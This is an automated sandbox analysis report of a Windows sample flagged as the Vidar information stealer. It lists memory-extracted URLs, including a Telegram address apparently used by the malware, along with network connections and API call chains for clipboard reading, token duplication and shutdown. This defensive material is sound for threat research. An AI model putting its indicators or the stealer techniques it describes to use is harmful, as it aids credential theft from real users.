          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comb
          Source: chrome.exe, 0000000F.00000003.2578653549.000003C801694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577610339.000003C801668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577470556.000003C801658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577531707.000003C801660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578234940.000003C8015A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
          Source: Fine.com, 0000000B.00000002.2943022245.0000000006C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: Fine.com, 0000000B.00000002.2943022245.0000000006C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: Fine.com, 0000000B.00000003.2441321400.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2935633690.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.0000000004010000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441368651.0000000004035000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441264032.0000000004313000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2939843523.0000000004311000.00000040.00001000.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441646535.00000000040BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/detct0r
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://tidal.com/
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://twitter.com/
          Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.20.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
          Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.20.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
          Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.20.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://vibe.naver.com/today
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://web.telegram.org/
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://web.whatsapp.com
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
          Source: Fine.com, 0000000B.00000002.2935633690.0000000000F86000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, DJMYUA.11.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
          Source: Bouquet.0.dr, Fine.com.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
          Source: Fine.com, 0000000B.00000002.2935633690.0000000000F86000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, DJMYUA.11.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.deezer.com/
          Source: Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.11.drString found in binary or memory: https://www.ecosia.org/newtab/
          Source: chrome.exe, 0000000F.00000003.2552400999.000003C800C94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557085148.000003C800C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578550719.000003C800C94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
          Source: chrome.exe, 0000000F.00000003.2552400999.000003C800C94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557085148.000003C800C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578550719.000003C800C94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
          Source: chrome.exe, 0000000F.00000003.2552400999.000003C800C94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557085148.000003C800C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578550719.000003C800C94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
          Source: Bouquet.0.dr, Fine.com.2.drString found in binary or memory: https://www.globalsign.com/repository/0
          Source: chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2555478690.000003C8010E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
          Source: Fine.com, 0000000B.00000002.2938149780.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.11.dr, Web Data.20.dr, XLFUAS.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: chrome.exe, 0000000F.00000003.2578653549.000003C801694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577610339.000003C801668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577470556.000003C801658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577531707.000003C801660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578234940.000003C8015A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
          Source: chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
          Source: chrome.exe, 0000000F.00000003.2556904309.000003C801090000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
          Source: chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
          Source: chrome.exe, 0000000F.00000003.2577748810.000003C801630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578653549.000003C801694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578234940.000003C8015A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
          Source: chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.rX6uZdQxZxU.2019.O/rt=j/m=q_dnp
          Source: chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.CEsjJf2wziM.L.W.O/m=qmd
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.iheart.com/podcast/
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.instagram.com
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.last.fm/
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.messenger.com
          Source: Fine.com, 0000000B.00000002.2943022245.0000000006C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
          Source: Fine.com, 0000000B.00000002.2943022245.0000000006C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
          Source: Fine.com, 0000000B.00000002.2943022245.0000000006C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: Fine.com, 0000000B.00000002.2943022245.0000000006C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: Fine.com, 0000000B.00000002.2943022245.0000000006C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
          Source: Fine.com, 0000000B.00000002.2943022245.0000000006C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.office.com
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.tiktok.com/
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://www.youtube.com
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://y.music.163.com/m/
          Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
          Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
          Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
          Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
          Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
          Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
          Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
          Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
          Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
          Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
          Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
          Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
          Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
          Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
          Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
          Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
          Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
          Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
          Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
          Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
          Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
          Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
          Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
          Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
          Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
          Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
          Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
          Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
          Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
          Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
          Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
          Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
          Source: unknownHTTPS traffic detected: 195.201.141.106:443 -> 192.168.2.5:49851 version: TLS 1.2
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0024F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_0024F7C7
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0024F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_0024F55C
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00269FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_00269FD2

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 11.2.Fine.com.4310000.1.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00244763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,11_2_00244763
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00231B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00231B4D
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0023F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_0023F20D
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeFile created: C:\Windows\ItunesTruthJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeFile created: C:\Windows\IntermediateEurosJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeFile created: C:\Windows\BoatingMauritiusJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeFile created: C:\Windows\OppositionHellJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_0040737E0_2_0040737E
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_00406EFE0_2_00406EFE
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_004079A20_2_004079A2
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_004049A80_2_004049A8
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001F801711_2_001F8017
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001EE14411_2_001EE144
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001DE1F011_2_001DE1F0
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0020A26E11_2_0020A26E
